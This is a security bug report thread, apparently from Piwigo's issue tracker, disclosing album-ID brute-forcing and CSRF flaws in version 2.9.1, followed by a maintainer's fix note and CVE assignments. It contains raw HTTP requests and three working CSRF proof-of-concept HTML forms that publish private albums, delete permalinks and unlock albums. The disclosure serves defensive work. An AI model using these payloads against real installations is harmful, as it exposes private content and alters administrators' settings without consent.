Bug Report: Set administrator private album to public via CSRF & Incorrect Permissions

[Akityo]

Proof-of-Concept

Version :2.9.1

Incorrect Permissions in album ID

The public / private tags
private means that administrator don’t want others know about album.
But there is some way to know what album his hiding.
And what the private album’s permalinks is.

1. By creating album , you could know that album id is in rule
2. So you can brute-force the album id

GET /piwigo/index.php?/category/757 HTTP/1.1
Host: www.test.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Referer: http://www.test.com/piwigo/index.php?/category/c1c12
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_display_thumbnail=display_thumbnail_classic; pwg_id=513v9ik9uahikec64vu4api2o5
Connection: close

- [√] Response with status 200 means that this album is accessible

- [√] Response with status 301 means that you don’t have the privilege to access.

Base on the brute-force result.
You can know the hidden album id

If the hidden album has set permalinks.
By request the album id ,permalinks is in the Response packet.

Now is time to republic it.

Cross-Site Request Forgery in page permalinks & status, visible, comments in page cat_options.

There is no pwg_token in the request.

So

1. set private albums to public

<html>
  <!-- CSRF PoC - generated by Akityo -->
  <body>
    <form action="http://www.test.com/piwigo/admin.php?page=cat_options&section=status" method="POST">
      <input type="hidden" name="cat&#95;false&#91;&#93;" value="757" />
      <input type="hidden" name="trueify" value="�&#171;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2. Permalink delete

<html>
  <!-- CSRF PoC - generated by Akityo -->
  <body>
    <form action="http://www.test.com/piwigo/admin.php">
      <input type="hidden" name="page" value="permalinks" />
      <input type="hidden" name="delete&#95;permanent" value="fffffff" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

3. unlock albums

<html>
  <!-- CSRF PoC - generated by Akityo -->
  <body>
    <form action="http://www.test.com/piwigo/admin.php?page=cat_options&section=visible" method="POST">
      <input type="hidden" name="cat&#95;false&#91;&#93;" value="756" />
      <input type="hidden" name="trueify" value="�&#171;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Original packet

POST /piwigo/admin.php?page=cat_options&section=status HTTP/1.1
Host: www.test.com
Content-Length: 34
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_display_thumbnail=display_thumbnail_classic; pwg_id=513v9ik9uahikec64vu4api2o5
Connection: close

cat_false%5B%5D=758&trueify=%C2%AB

Refences: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Discover By: topsec(Li Zhiqiang)

[flop25]

Thank you for reporting
I've added the pwg_token
I open another one about the permalink answered when requesting an private id

[fgeek]

CVE-2017-10678, CVE-2017-10679, CVE-2017-10680 and CVE-2017-10681 and has been assigned for these issues.